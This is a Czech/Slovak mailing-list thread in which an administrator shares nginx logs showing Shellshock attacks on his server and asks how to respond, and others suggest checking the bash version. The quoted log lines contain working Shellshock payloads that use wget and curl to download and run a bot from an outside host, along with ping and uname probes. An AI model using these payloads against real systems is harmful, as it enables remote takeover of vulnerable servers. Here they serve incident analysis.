Ja mam v logoch nasledovne

root@yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log: - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z MailScanner warning: numerical links are often malicious:;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log: - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z MailScanner warning: numerical links are often malicious:;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log: - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z MailScanner warning: numerical links are often malicious:;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1: - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log.1: - - [25/Sep/2014:11:26:32 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1"
/var/log/nginx/access.log.1: - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1: - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?

2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik@mimik.sk>:
jedine si zistit ci mas dobru verziu bashu.

On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar@zazen-nudu.cz> wrote:

> Ahoj,
> možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
> Honza
> On 29.9.2014 10:02, Petr Krcmar wrote:
>> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
>>> Hele,
>>> z jineho stroje:
>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
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